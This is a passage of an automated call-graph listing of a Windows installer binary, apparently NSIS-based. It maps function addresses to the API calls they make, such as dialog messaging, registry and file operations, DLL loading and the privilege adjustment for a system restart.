4789->4790 4791 403f6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4790->4791 4792 401389 2 API calls 4791->4792 4793 403fb1 4792->4793 4793->4757 4794 403fb9 ShowWindow 4793->4794 4795 404094 SendMessageA 4794->4795 4795->4796 4796->4755 4796->4757 4798 405e85 18 API calls 4797->4798 4799 404053 SetDlgItemTextA 4798->4799 4799->4773 4800->4777 4801->4780 4802->4783 4804 404028 4803->4804 4805 40402e SendMessageA 4803->4805 4804->4805 4805->4766 4807 404150 4806->4807 4808 4040c7 GetWindowLongA 4806->4808 4807->4757 4808->4807 4809 4040d8 4808->4809 4810 4040e7 GetSysColor 4809->4810 4811 4040ea 4809->4811 4810->4811 4812 4040f0 SetTextColor 4811->4812 4813 4040fa SetBkMode 4811->4813 4812->4813 4814 404112 GetSysColor 4813->4814 4815 404118 4813->4815 4814->4815 4816 40411f SetBkColor 4815->4816 4817 404129 4815->4817 4816->4817 4817->4807 4818 404143 CreateBrushIndirect 4817->4818 4819 40413c DeleteObject 4817->4819 4818->4807 4819->4818 5180 4018f5 5181 40192c 5180->5181 5182 402a3a 18 API calls 5181->5182 5183 401931 5182->5183 5184 405705 69 API calls 5183->5184 5185 40193a 5184->5185 5186 4024f7 5187 402a3a 18 API calls 5186->5187 5188 4024fe 5187->5188 5191 405ad6 GetFileAttributesA CreateFileA 5188->5191 5190 40250a 5191->5190 5192 4018f8 5193 402a3a 18 API calls 5192->5193 5194 4018ff 5193->5194 5195 405659 MessageBoxIndirectA 5194->5195 5196 401908 5195->5196 5197 4049f9 GetDlgItem GetDlgItem 5198 404a4b 7 API calls 5197->5198 5205 404c63 5197->5205 5199 404ae1 SendMessageA 5198->5199 5200 404aee DeleteObject 5198->5200 5199->5200 5201 404af7 5200->5201 5203 404b2e 5201->5203 5204 405e85 18 API calls 5201->5204 5202 404d47 5207 404df3 5202->5207 5217 404da0 SendMessageA 5202->5217 5240 404c56 5202->5240 5206 404048 19 API calls 5203->5206 5208 404b10 SendMessageA SendMessageA 5204->5208 5205->5202 5215 404947 5 API calls 5205->5215 5238 404cd4 5205->5238 5211 404b42 5206->5211 5209 404e05 5207->5209 5210 404dfd SendMessageA 5207->5210 5208->5201 5214 404e2e 5209->5214 5220 404e17 ImageList_Destroy 5209->5220 5221 404e1e 5209->5221 5210->5209 5216 404048 19 API calls 5211->5216 5212 4040af 8 API calls 5219 404fe9 5212->5219 5213 404d39 SendMessageA 5213->5202 5222 404f9d 5214->5222 5239 4049c7 4 API calls 5214->5239 5244 404e69 5214->5244 5215->5238 5228 404b50 5216->5228 5218 404db5 SendMessageA 5217->5218 5217->5240 5225 404dc8 5218->5225 5220->5221 5221->5214 5223 404e27 GlobalFree 5221->5223 5226 404faf ShowWindow GetDlgItem ShowWindow 5222->5226 5222->5240 5223->5214 5224 404c24 GetWindowLongA SetWindowLongA 5227 404c3d 5224->5227 5232 404dd9 SendMessageA 5225->5232 5226->5240 5229 404c43 ShowWindow 5227->5229 5230 404c5b 5227->5230 5228->5224 5231 404b9f SendMessageA 5228->5231 5233 404c1e 5228->5233 5236 404bdb SendMessageA 5228->5236 5237 404bec SendMessageA 5228->5237 5248 40407d SendMessageA 5229->5248 5249 40407d SendMessageA 5230->5249 5231->5228 5232->5207 5233->5224 5233->5227 5236->5228 5237->5228 5238->5202 5238->5213 5239->5244 5240->5212 5241 404f73 InvalidateRect 5241->5222 5242 404f89 5241->5242 5250 404902 5242->5250 5243 404e97 SendMessageA 5247 404ead 5243->5247 5244->5243 5244->5247 5246 404f21 SendMessageA SendMessageA 5246->5247 5247->5241 5247->5246 5248->5240 5249->5205 5253 40483d 5250->5253 5252 404917 5252->5222 5254 404853 5253->5254 5255 405e85 18 API calls 5254->5255 5256 4048b7 5255->5256 5257 405e85 18 API calls 5256->5257 5258 4048c2 5257->5258 5259 405e85 18 API calls 5258->5259 5260 4048d8 lstrlenA wsprintfA SetDlgItemTextA 5259->5260 5260->5252 5268 1000103d 5269 1000101b 5 API calls 5268->5269 5270 10001056 5269->5270 5271 4014fe 5272 401506 5271->5272 5274 401519 5271->5274 5273 402a1d 18 API calls 5272->5273 5273->5274 5275 402b7f 5276 402ba7 5275->5276 5277 402b8e SetTimer 5275->5277 5278 402bf5 5276->5278 5279 402bfb MulDiv 5276->5279 5277->5276 5280 402bb5 wsprintfA SetWindowTextA SetDlgItemTextA 5279->5280 5280->5278 5282 401000 5283 401037 BeginPaint GetClientRect 5282->5283 5284 40100c DefWindowProcA 5282->5284 5285 4010f3 5283->5285 5287 401179 5284->5287 5288 401073 CreateBrushIndirect FillRect DeleteObject 5285->5288 5289 4010fc 5285->5289 5288->5285 5290 401102 CreateFontIndirectA 5289->5290 5291 401167 EndPaint 5289->5291 5290->5291 5292 401112 6 API calls 5290->5292 5291->5287 5292->5291 5293 402482 5294 402b44 19 API calls 5293->5294 5295 40248c 5294->5295 5296 402a1d 18 API calls 5295->5296 5297 402495 5296->5297 5298 4024b8 RegEnumValueA 5297->5298 5299 4024ac RegEnumKeyA 5297->5299 5300 4026a6 5297->5300 5298->5300 5301 4024d1 RegCloseKey 5298->5301 5299->5301 5301->5300 5303 401b02 5304 402a3a 18 API calls 5303->5304 5305 401b09 5304->5305 5306 402a1d 18 API calls 5305->5306 5307 401b12 wsprintfA 5306->5307 5308 4028cf 5307->5308 5309 401a03 5310 402a3a 18 API calls 5309->5310 5311 401a0c ExpandEnvironmentStringsA 5310->5311 5312 401a20 5311->5312 5314 401a33 5311->5314 5313 401a25 lstrcmpA 5312->5313 5312->5314 5313->5314 5315 402283 5316 402291 5315->5316 5317 40228b 5315->5317 5319 402a3a 18 API calls 5316->5319 5322 4022a1 5316->5322 5318 402a3a 18 API calls 5317->5318 5318->5316 5319->5322 5320 402a3a 18 API calls 5323 4022af 5320->5323 5321 402a3a 18 API calls 5324 4022b8 WritePrivateProfileStringA 5321->5324 5322->5320 5322->5323 5323->5321 5325 100029c3 5326 100029db 5325->5326 5327 10001534 2 API calls 5326->5327 5328 100029f6 5327->5328 5329 404486 5330 4044b2 5329->5330 5331 4044c3 5329->5331 5390 40563d GetDlgItemTextA 5330->5390 5333 4044cf GetDlgItem 5331->5333 5334 40452e 5331->5334 5337 4044e3 5333->5337 5335 404612 5334->5335 5342 405e85 18 API calls 5334->5342 5388 4047bc 5334->5388 5335->5388 5392 40563d GetDlgItemTextA 5335->5392 5336 4044bd 5338 4060ce 5 API calls 5336->5338 5340 4044f7 SetWindowTextA 5337->5340 5341 40596e 4 API calls 5337->5341 5338->5331 5344 404048 19 API calls 5340->5344 5346 4044ed 5341->5346 5347 4045a2 SHBrowseForFolderA 5342->5347 5343 404642 5348 4059c3 18 API calls 5343->5348 5349 404513 5344->5349 5345 4040af 8 API calls 5350 4047d0 5345->5350 5346->5340 5354 4058d5 3 API calls 5346->5354 5347->5335 5351 4045ba CoTaskMemFree 5347->5351 5352 404648 5348->5352 5353 404048 19 API calls 5349->5353 5355 4058d5 3 API calls 5351->5355 5393 405e63 lstrcpynA 5352->5393 5356 404521 5353->5356 5354->5340 5359 4045c7 5355->5359 5391 40407d SendMessageA 5356->5391 5360 4045fe SetDlgItemTextA 5359->5360 5365 405e85 18 API calls 5359->5365 5360->5335 5361 404527 5363 4061fc 5 API calls 5361->5363 5362 40465f 5364 4061fc 5 API calls 5362->5364 5363->5334 5371 404666 5364->5371 5366 4045e6 lstrcmpiA 5365->5366 5366->5360 5369 4045f7 lstrcatA 5366->5369 5367 4046a2 5394 405e63 lstrcpynA 5367->5394 5369->5360 5370 4046a9 5372 40596e 4 API calls 5370->5372 5371->5367 5375 40591c 2 API calls 5371->5375 5377 4046fa 5371->5377 5373 4046af GetDiskFreeSpaceA 5372->5373 5376 4046d3 MulDiv 5373->5376 5373->5377 5375->5371 5376->5377 5378 40476b 5377->5378 5380 404902 21 API calls 5377->5380 5379 40478e 5378->5379 5381 40140b 2 API calls 5378->5381 5395 40406a KiUserCallbackDispatcher 5379->5395 5382 404758 5380->5382 5381->5379 5384 40476d SetDlgItemTextA 5382->5384 5385 40475d 5382->5385 5384->5378 5387 40483d 21 API calls 5385->5387 5386 4047aa 5386->5388 5396 40441b 5386->5396 5387->5378 5388->5345 5390->5336 5391->5361 5392->5343 5393->5362 5394->5370 5395->5386 5397 404429 5396->5397 5398 40442e SendMessageA 5396->5398 5397->5398 5398->5388 5399 402688 5400 402a3a 18 API calls 5399->5400 5401 40268f FindFirstFileA 5400->5401 5402 4026b2 5401->5402 5406 4026a2 5401->5406 5403 4026b9 5402->5403 5407 405dc1 wsprintfA 5402->5407 5408 405e63 lstrcpynA 5403->5408 5407->5403 5408->5406 5409 402308 5410 402338 5409->5410 5411 40230d 5409->5411 5413 402a3a 18 API calls 5410->5413 5412 402b44 19 API calls 5411->5412 5414 402314 5412->5414 5415 40233f 5413->5415 5416 402a3a 18 API calls 5414->5416 5419 402355 5414->5419 5420 402a7a RegOpenKeyExA 5415->5420 5417 402325 RegDeleteValueA RegCloseKey 5416->5417 5417->5419 5421 402af1 5420->5421 5423 402aa5 5420->5423 5421->5419 5422 402acb RegEnumKeyA 5422->5423 5424 402add RegCloseKey 5422->5424 5423->5422 5423->5424 5425 402b02 RegCloseKey 5423->5425 5427 402a7a 5 API calls 5423->5427 5426 4061fc 5 API calls 5424->5426 5425->5421 5428 402aed 5426->5428 5427->5423 5428->5421 5429 402b1d RegDeleteKeyA 5428->5429 5429->5421 5430 401c8a 5431 402a1d 18 API calls 5430->5431 5432 401c90 IsWindow 5431->5432 5433 4019f3 5432->5433 4456 401f90 4457 401fa2 4456->4457 4458 402050 4456->4458 4459 402a3a 18 API calls 4457->4459 4460 401423 25 API calls 4458->4460 4461 401fa9 4459->4461 4467 4021c9 4460->4467 4462 402a3a 18 API calls 4461->4462 4463 401fb2 4462->4463 4464 401fc7 LoadLibraryExA 4463->4464 4465 401fba GetModuleHandleA 4463->4465 4464->4458 4466 401fd7 GetProcAddress 4464->4466 4465->4464 4465->4466 4468 402023 4466->4468 4469 401fe6 4466->4469 4472 40507c 25 API calls 4468->4472 4470 402005 4469->4470 4471 401fee 4469->4471 4477 100016bd 4470->4477 4473 401423 25 API calls 4471->4473 4474 401ff6 4472->4474 4473->4474 4474->4467 4475 402044 FreeLibrary 4474->4475 4475->4467 4478 100016ed 4477->4478 4519 10001a5d 4478->4519 4480 100016f4 4481 1000180a 4480->4481 4482 10001705 4480->4482 4483 1000170c 4480->4483 4481->4474 4568 100021b0 4482->4568 4551 100021fa 4483->4551 4488 10001770 4494 100017b2 4488->4494 4495 10001776 4488->4495 4489 10001752 4581 100023da 4489->4581 4490 10001722 4493 10001728 4490->4493 4499 10001733 4490->4499 4491 1000173b 4504 10001731 4491->4504 4578 10002aa3 4491->4578 4493->4504 4562 100027e8 4493->4562 4497 100023da 11 API calls 4494->4497 4501 10001559 3 API calls 4495->4501 4502 100017a4 4497->4502 4498 10001758 4592 10001559 4498->4592 4572 10002589 4499->4572 4506 1000178c 4501->4506 4518 100017f9 4502->4518 4603 100023a0 4502->4603 4504->4488 4504->4489 4509 100023da 11 API calls 4506->4509 4508 10001739 4508->4504 4509->4502 4511 10001803 GlobalFree 4511->4481 4515 100017e5 4515->4518 4607 100014e2 wsprintfA 4515->4607 4516 100017de FreeLibrary 4516->4515 4518->4481 4518->4511 4610 10001215 GlobalAlloc 4519->4610 4521 10001a81 4611 10001215 GlobalAlloc 4521->4611 4523 10001cbb GlobalFree GlobalFree GlobalFree 4524 10001cd8 4523->4524 4543 10001d22 4523->4543 4525 1000201a 4524->4525 4532 10001ced 4524->4532 4524->4543 4527 1000203c GetModuleHandleA 4525->4527 4525->4543 4526 10001b60 GlobalAlloc 4547 10001a8c 4526->4547 4530 10002062 4527->4530 4531 1000204d LoadLibraryA 4527->4531 4528 10001bab lstrcpyA 4533 10001bb5 lstrcpyA 4528->4533 4529 10001bc9 GlobalFree 4529->4547 4618 100015a4 GetProcAddress 4530->4618 4531->4530 4531->4543 4532->4543 4614 10001224 4532->4614 4533->4547 4535 100020b3 4537 100020c0 lstrlenA 4535->4537 4535->4543 4536 10001f7a 4542 10001fbe lstrcpyA 4536->4542 4536->4543 4619 100015a4 GetProcAddress 4537->4619 4539 10002074 4539->4535 4550 1000209d GetProcAddress 4539->4550 4542->4543 4543->4480 4544 10001c07 4544->4547 4612 10001534 GlobalSize GlobalAlloc 4544->4612 4545 10001e75 GlobalFree 4545->4547 4546 100020d9 4546->4543 4547->4523 4547->4526 4547->4528 4547->4529 4547->4533 4547->4536 4547->4543 4547->4544 4547->4545 4549 10001224 2 API calls 4547->4549 4617 10001215 GlobalAlloc 4547->4617 4549->4547 4550->4535 4558 10002212 4551->4558 4552 10001224 GlobalAlloc lstrcpynA 4552->4558 4554 10002349 GlobalFree 4557 10001712 4554->4557 4554->4558 4555 100022b9 GlobalAlloc MultiByteToWideChar 4559 10002303 4555->4559 4560 100022e3 GlobalAlloc CLSIDFromString GlobalFree 4555->4560 4556 1000230a lstrlenA 4556->4554 4556->4559 4557->4490 4557->4491 4557->4504 4558->4552 4558->4554 4558->4555 4558->4556 4621 100012ad 4558->4621 4559->4554 4625 1000251d 4559->4625 4560->4554 4564 100027fa 4562->4564 4563 1000289f SetFilePointer 4565 100028bd 4563->4565 4564->4563 4566 100029b9 4565->4566 4567 100029ae GetLastError 4565->4567 4566->4504 4567->4566 4569 100021c0 4568->4569 4570 1000170b 4568->4570 4569->4570 4571 100021d2 GlobalAlloc 4569->4571 4570->4483 4571->4569 4576 100025a5 4572->4576 4573 100025f6 GlobalAlloc 4577 10002618 4573->4577 4574 10002609 4575 1000260e GlobalSize 4574->4575 4574->4577 4575->4577 4576->4573 4576->4574 4577->4508 4579 10002aae 4578->4579 4580 10002aee GlobalFree 4579->4580 4628 10001215 GlobalAlloc 4581->4628 4583 1000243a lstrcpynA 4589 100023e6 4583->4589 4584 1000244b StringFromGUID2 WideCharToMultiByte 4584->4589 4585 1000246f WideCharToMultiByte 4585->4589 4586 10002490 wsprintfA 4586->4589 4587 100024b4 GlobalFree 4587->4589 4588 100024ee GlobalFree 4588->4498 4589->4583 4589->4584 4589->4585 4589->4586 4589->4587 4589->4588 4590 10001266 2 API calls 4589->4590 4629 100012d1 4589->4629 4590->4589 4633 10001215 GlobalAlloc 4592->4633 4594 1000155f 4595 1000156c lstrcpyA 4594->4595 4597 10001586 4594->4597 4598 100015a0 4595->4598 4597->4598 4599 1000158b wsprintfA 4597->4599 4600 10001266 4598->4600 4599->4598 4601 100012a8 GlobalFree 4600->4601 4602 1000126f GlobalAlloc lstrcpynA 4600->4602 4601->4502 4602->4601 4604 100023ae 4603->4604 4605 100017c5 4603->4605 4604->4605 4606 100023c7 GlobalFree 4604->4606 4605->4515 4605->4516 4606->4604 4608 10001266 2 API calls 4607->4608 4609 10001503 4608->4609 4609->4518 4610->4521 4611->4547 4613 10001552 4612->4613 4613->4544 4620 10001215 GlobalAlloc 4614->4620 4616 10001233 lstrcpynA 4616->4543 4617->4547 4618->4539 4619->4546 4620->4616 4622 100012b4 4621->4622 4623 10001224 2 API calls 4622->4623 4624 100012cf 4623->4624 4624->4558 4626 10002581 4625->4626 4627 1000252b VirtualAlloc 4625->4627 4626->4559 4627->4626 4628->4589 4630 100012f9 4629->4630 4631 100012da 4629->4631 4630->4589 4631->4630 4632 100012e0 lstrcpyA 4631->4632 4632->4630 4633->4594 4634 402410 4645 402b44 4634->4645 4636 40241a 4637 402a3a 18 API calls 4636->4637 4638 402423 4637->4638 4639 4026a6 4638->4639 4640 40242d RegQueryValueExA 4638->4640 4641 40244d 4640->4641 4644 402453 RegCloseKey 4640->4644 4641->4644 4649 405dc1 wsprintfA 4641->4649 4644->4639 4646 402a3a 18 API calls 4645->4646 4647 402b5d 4646->4647 4648 402b6b RegOpenKeyExA 4647->4648 4648->4636 4649->4644 5434 401490 5435 40507c 25 API calls 5434->5435 5436 401497 5435->5436 5437 404191 5438 4041a7 5437->5438 5443 4042b3 5437->5443 5441 404048 19 API calls 5438->5441 5439 404322 5440 4043f6 5439->5440 5442 40432c GetDlgItem 5439->5442 5448 4040af 8 API calls 5440->5448 5444 4041fd 5441->5444 5445 404342 5442->5445 5446 4043b4 5442->5446 5443->5439 5443->5440 5447 4042f7 GetDlgItem SendMessageA 5443->5447 5449 404048 19 API calls 5444->5449 5445->5446 5450 404368 6 API calls 5445->5450 5446->5440 5451 4043c6 5446->5451 5468 40406a KiUserCallbackDispatcher 5447->5468 5458 4043f1 5448->5458 5453 40420a CheckDlgButton 5449->5453 5450->5446 5454 4043cc SendMessageA 5451->5454 5455 4043dd 5451->5455 5466 40406a KiUserCallbackDispatcher 5453->5466 5454->5455 5455->5458 5459 4043e3 SendMessageA 5455->5459 5456 40431d 5460 40441b SendMessageA 5456->5460 5459->5458 5460->5439 5461 404228 GetDlgItem 5467 40407d SendMessageA 5461->5467 5463 40423e SendMessageA 5464 404265 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5463->5464 5465 40425c GetSysColor 5463->5465 5464->5458 5465->5464 5466->5461 5467->5463 5468->5456 4820 401595 4821 402a3a 18 API calls 4820->4821 4822 40159c SetFileAttributesA 4821->4822 4823 4015ae 4822->4823 5476 401717 5477 402a3a 18 API calls 5476->5477 5478 40171e SearchPathA 5477->5478 5479 401739 5478->5479 5480 10001058 5481 10001074 5480->5481 5482 100010dc 5481->5482 5483 10001091 5481->5483 5484 100014bb GlobalFree 5481->5484 5485 100014bb GlobalFree 5483->5485 5484->5483 5486 100010a1 5485->5486 5487 100010b1 5486->5487 5488 100010a8 GlobalSize 5486->5488 5489 100010b5 GlobalAlloc 5487->5489 5490 100010c6 5487->5490 5488->5487 5491 100014e2 3 API calls 5489->5491 5492 100010d1 GlobalFree 5490->5492 5491->5490 5492->5482 5493 402519 5494 40252e 5493->5494 5495 40251e 5493->5495 5497 402a3a 18 API calls 5494->5497 5496 402a1d 18 API calls 5495->5496 5499 402527 5496->5499 5498 402535 lstrlenA 5497->5498 5498->5499 5500 402557 5499->5500 5501 405b7d WriteFile 5499->5501 5501->5500 5502 40149d 5503 4014ab PostQuitMessage 5502->5503 5504 40226e 5502->5504 5503->5504 5505 100010e0 5509 1000110e 5505->5509 5506 100011c4 GlobalFree 5507 100012ad 2 API calls 5507->5509 5508 100011c3 5508->5506 5509->5506 5509->5507 5509->5508 5510 10001155 GlobalAlloc 5509->5510 5511 100011ea GlobalFree 5509->5511 5512 10001266 2 API calls 5509->5512 5513 100011b1 GlobalFree 5509->5513 5514 100012d1 lstrcpyA 5509->5514 5510->5509 5511->5509 5512->5513 5513->5509 5514->5509 5515 4037a1 5516 4037ac 5515->5516 5517 4037b0 5516->5517 5518 4037b3 GlobalAlloc 5516->5518 5518->5517 5526 10002162 5527 100021c0 5526->5527 5528 100021f6 5526->5528 5527->5528 5529 100021d2 GlobalAlloc 5527->5529 5529->5527 5530 401b23 5531 401b74 5530->5531 5535 401b30 5530->5535 5532 401b78 5531->5532 5533 401b9d GlobalAlloc 5531->5533 5546 40226e 5532->5546 5551 405e63 lstrcpynA 5532->5551 5534 405e85 18 API calls 5533->5534 5538 401bb8 5534->5538 5535->5538 5539 401b47 5535->5539 5536 405e85 18 API calls 5540 402268 5536->5540 5538->5536 5538->5546 5549 405e63 lstrcpynA 5539->5549 5544 405659 MessageBoxIndirectA 5540->5544 5541 401b8a GlobalFree 5541->5546 5543 401b56 5550 405e63 lstrcpynA 5543->5550 5544->5546 5547 401b65 5552 405e63 lstrcpynA 5547->5552 5549->5543 5550->5547 5551->5541 5552->5546 5553 401ca7 5554 402a1d 18 API calls 5553->5554 5555 401cae 5554->5555 5556 402a1d 18 API calls 5555->5556 5557 401cb6 GetDlgItem 5556->5557 5558 402513 5557->5558 4058 40192a 4059 40192c 4058->4059 4060 402a3a 18 API calls 4059->4060 4061 401931 4060->4061 4064 405705 4061->4064 4105 4059c3 4064->4105 4067 405744 4070 40587c 4067->4070 4119 405e63 lstrcpynA 4067->4119 4068 40572d DeleteFileA 4069 40193a 4068->4069 4070->4069 4137 406167 FindFirstFileA 4070->4137 4072 40576a 4073 405770 lstrcatA 4072->4073 4074 40577d 4072->4074 4075 405783 4073->4075 4120 40591c lstrlenA 4074->4120 4078 405791 lstrcatA 4075->4078 4079 405788 4075->4079 4081 40579c lstrlenA FindFirstFileA 4078->4081 4079->4078 4079->4081 4083 405872 4081->4083 4103 4057c0 4081->4103 4082 40589a 4140 4058d5 lstrlenA CharPrevA 4082->4140 4083->4070 4085 405900 CharNextA 4085->4103 4087 4056bd 5 API calls 4088 4058ac 4087->4088 4089 4058b0 4088->4089 4090 4058c6 4088->4090 4089->4069 4094 40507c 25 API calls 4089->4094 4092 40507c 25 API calls 4090->4092 4092->4069 4093 405851 FindNextFileA 4095 405869 FindClose 4093->4095 4093->4103 4096 4058bd 4094->4096 4095->4083 4097 405d1e 38 API calls 4096->4097 4100 4058c4 4097->4100 4099 405705 62 API calls 4099->4103 4100->4069 4101 40507c 25 API calls 4101->4093 4102 40507c 25 API calls 4102->4103 4103->4085 4103->4093 4103->4099 4103->4101 4103->4102 4124 405e63 lstrcpynA 4103->4124 4125 4056bd 4103->4125 4133 405d1e MoveFileExA 4103->4133 4143 405e63 lstrcpynA 4105->4143 4107 4059d4 4144 40596e CharNextA CharNextA 4107->4144 4110 405725 4110->4067 4110->4068 4111 4060ce 5 API calls 4117 4059ea 4111->4117 4112 405a15 lstrlenA 4113 405a20 4112->4113 4112->4117 4114 4058d5 3 API calls 4113->4114 4116 405a25 GetFileAttributesA 4114->4116 4115 406167 2 API calls 4115->4117 4116->4110 4117->4110 4117->4112 4117->4115 4118 40591c 2 API calls 4117->4118 4118->4112 4119->4072 4121 405929 4120->4121 4122 40593a 4121->4122 4123 40592e CharPrevA 4121->4123 4122->4075 4123->4121 4123->4122 4124->4103 4150 405ab1 GetFileAttributesA 4125->4150 4128 4056e0 DeleteFileA 4131 4056e6 4128->4131 4129 4056d8 RemoveDirectoryA 4129->4131 4130 4056ea 4130->4103 4131->4130 4132 4056f6 SetFileAttributesA 4131->4132 4132->4130 4134 405d3f 4133->4134 4135 405d32 4133->4135 4134->4103 4153 405bac lstrcpyA 4135->4153 4138 405896 4137->4138 4139 40617d FindClose 4137->4139 4138->4069 4138->4082 4139->4138 4141 4058a0 4140->4141 4142 4058ef lstrcatA 4140->4142 4141->4087 4142->4141 4143->4107 4145 405989 4144->4145 4148 405999 4144->4148 4147 405994 CharNextA 4145->4147 4145->4148 4146 4059b9 4146->4110 4146->4111 4147->4146 4148->4146 4149 405900 CharNextA 4148->4149 4149->4148 4151 4056c9 4150->4151 4152 405ac3 SetFileAttributesA 4150->4152 4151->4128 4151->4129 4151->4130 4152->4151 4154 405bd4 4153->4154 4155 405bfa GetShortPathNameA 4153->4155 4180 405ad6 GetFileAttributesA CreateFileA 4154->4180 4156 405d19 4155->4156 4157 405c0f 4155->4157 4156->4134 4157->4156 4160 405c17 wsprintfA 4157->4160 4159 405bde CloseHandle GetShortPathNameA 4159->4156 4161 405bf2 4159->4161 4162 405e85 18 API calls 4160->4162 4161->4155 4161->4156 4163 405c3f 4162->4163 4181 405ad6 GetFileAttributesA CreateFileA 4163->4181 4165 405c4c 4165->4156 4166 405c5b GetFileSize GlobalAlloc 4165->4166 4167 405d12 CloseHandle 4166->4167 4168 405c7d 4166->4168 4167->4156 4169 405b4e ReadFile 4168->4169 4170 405c85 4169->4170 4170->4167 4182 405a3b lstrlenA 4170->4182 4173 405cb0 4176 405a3b 4 API calls 4173->4176 4174 405c9c lstrcpyA 4175 405cbe 4174->4175 4177 405cf5 SetFilePointer 4175->4177 4176->4175 4178 405b7d WriteFile 4177->4178 4179 405d0b GlobalFree 4178->4179 4179->4167 4180->4159 4181->4165 4183 405a7c lstrlenA 4182->4183 4184 405a55 lstrcmpiA 4183->4184 4186 405a84 4183->4186 4185 405a73 CharNextA 4184->4185 4184->4186 4185->4183 4186->4173 4186->4174 5559 4028aa SendMessageA 5560 4028c4 InvalidateRect 5559->5560 5561 4028cf 5559->5561 5560->5561 4190 40322b SetErrorMode GetVersion 4191 403262 4190->4191 4192 403268 4190->4192 4193 4061fc 5 API calls 4191->4193 4278 40618e GetSystemDirectoryA 4192->4278 4193->4192 4195 40327e lstrlenA 4195->4192 4196 40328d 4195->4196 4281 4061fc GetModuleHandleA 4196->4281 4199 4061fc 5 API calls 4200 40329c #17 OleInitialize SHGetFileInfoA 4199->4200 4287 405e63 lstrcpynA 4200->4287 4202 4032d9 GetCommandLineA 4288 405e63 lstrcpynA 4202->4288 4204 4032eb GetModuleHandleA 4205 403302 4204->4205 4206 405900 CharNextA 4205->4206 4207 403316 CharNextA 4206->4207 4216 403326 4207->4216 4208 4033f0 4209 403403 GetTempPathA 4208->4209 4289 4031fa 4209->4289 4211 40341b 4213 403475 DeleteFileA 4211->4213 4214 40341f GetWindowsDirectoryA lstrcatA 4211->4214 4212 405900 CharNextA 4212->4216 4299 402cb6 GetTickCount GetModuleFileNameA 4213->4299 4217 4031fa 12 API calls 4214->4217 4216->4208 4216->4212 4218 4033f2 4216->4218 4220 40343b 4217->4220 4385 405e63 lstrcpynA 4218->4385 4219 403489 4224 40350f 4219->4224 4228 405900 CharNextA 4219->4228 4274 40351f 4219->4274 4220->4213 4222 40343f GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4220->4222 4223 4031fa 12 API calls 4222->4223 4226 40346d 4223->4226 4329 4037e3 4224->4329 4226->4213 4226->4274 4230 4034a4 4228->4230 4239 4034ea 4230->4239 4240 40354f 4230->4240 4231 403657 4233 4036d9 ExitProcess 4231->4233 4234 40365f GetCurrentProcess OpenProcessToken 4231->4234 4232 403539 4397 405659 4232->4397 4236 4036aa 4234->4236 4237 40367a LookupPrivilegeValueA AdjustTokenPrivileges 4234->4237 4242 4061fc 5 API calls 4236->4242 4237->4236 4243 4059c3 18 API calls 4239->4243 4401 4055dc 4240->4401 4246 4036b1 4242->4246 4247 4034f5 4243->4247 4250 4036c6 ExitWindowsEx 4246->4250 4253 4036d2 4246->4253 4247->4274 4386 405e63 lstrcpynA 4247->4386 4248 403570 lstrcatA lstrcmpiA 4252 40358c 4248->4252 4248->4274 4249 403565 lstrcatA 4249->4248 4250->4233 4250->4253 4255 403591 4252->4255 4256 403598 4252->4256 4414 40140b 4253->4414 4254 403504 4387 405e63 lstrcpynA 4254->4387 4404 405542 CreateDirectoryA 4255->4404 4409 4055bf CreateDirectoryA 4256->4409 4262 40359d SetCurrentDirectoryA 4263 4035b7 4262->4263 4264 4035ac 4262->4264 4413 405e63 lstrcpynA 4263->4413 4412 405e63 lstrcpynA 4264->4412 4267 4035c5 4268 405e85 18 API calls 4267->4268 4271 40364b 4267->4271 4272 405d1e 38 API calls 4267->4272 4275 405e85 18 API calls 4267->4275 4276 4055f4 2 API calls 4267->4276 4277 403637 CloseHandle 4267->4277 4269 4035f6 DeleteFileA 4268->4269 4269->4267 4270 403603 CopyFileA 4269->4270 4270->4267 4273 405d1e 38 API calls 4271->4273 4272->4267 4273->4274 4388 4036f1 4274->4388 4275->4267 4276->4267 4277->4267 4279 4061b0 wsprintfA LoadLibraryExA 4278->4279 4279->4195 4282 406222 GetProcAddress 4281->4282 4283 406218 4281->4283 4285 403295 4282->4285 4284 40618e 3 API calls 4283->4284 4286 40621e 4284->4286 4285->4199 4286->4282 4286->4285 4287->4202 4288->4204 4290 4060ce 5 API calls 4289->4290 4291 403206 4290->4291 4292 403210 4291->4292 4293 4058d5 3 API calls 4291->4293 4292->4211 4294 403218 4293->4294 4295 4055bf 2 API calls 4294->4295 4296 40321e 4295->4296 4417 405b05 4296->4417 4421 405ad6 GetFileAttributesA CreateFileA 4299->4421 4301 402cf9 4328 402d06 4301->4328 4422 405e63 lstrcpynA 4301->4422 4303 402d1c 4304 40591c 2 API calls 4303->4304 4305 402d22 4304->4305 4423 405e63 lstrcpynA 4305->4423 4307 402d2d GetFileSize 4308 402e2e 4307->4308 4310 402d44 4307->4310 4309 402c17 33 API calls 4308->4309 4312 402e35 4309->4312 4310->4308 4311 4031cd ReadFile 4310->4311 4313 402ec9 4310->4313 4319 402c17 33 API calls 4310->4319 4310->4328 4311->4310 4314 402e71 GlobalAlloc 4312->4314 4312->4328 4425 4031e3 SetFilePointer 4312->4425 4316 402c17 33 API calls 4313->4316 4315 402e88 4314->4315 4320 405b05 2 API calls 4315->4320 4316->4328 4318 402e52 4321 4031cd ReadFile 4318->4321 4319->4310 4322 402e99 CreateFileA 4320->4322 4323 402e5d 4321->4323 4324 402ed3 4322->4324 4322->4328 4323->4314 4323->4328 4424 4031e3 SetFilePointer 4324->4424 4326 402ee1 4327 402f5c 45 API calls 4326->4327 4327->4328 4328->4219 4330 4061fc 5 API calls 4329->4330 4331 4037f7 4330->4331 4332 4037fd 4331->4332 4333 40380f 4331->4333 4442 405dc1 wsprintfA 4332->4442 4334 405d4a 3 API calls 4333->4334 4335 40383a 4334->4335 4337 403858 lstrcatA 4335->4337 4338 405d4a 3 API calls 4335->4338 4339 40380d 4337->4339 4338->4337 4426 403aa8 4339->4426 4342 4059c3 18 API calls 4343 40388a 4342->4343 4344 403913 4343->4344 4346 405d4a 3 API calls 4343->4346 4345 4059c3 18 API calls 4344->4345 4347 403919 4345->4347 4355 4038b6 4346->4355 4348 403929 LoadImageA 4347->4348 4349 405e85 18 API calls 4347->4349 4350 403950 RegisterClassA 4348->4350 4351 4039cf 4348->4351 4349->4348 4352 403986 SystemParametersInfoA CreateWindowExA 4350->4352 4384 4039d9 4350->4384 4353 40140b 2 API calls 4351->4353 4352->4351 4358 4039d5 4353->4358 4354 4038d2 lstrlenA 4356 4038e0 lstrcmpiA 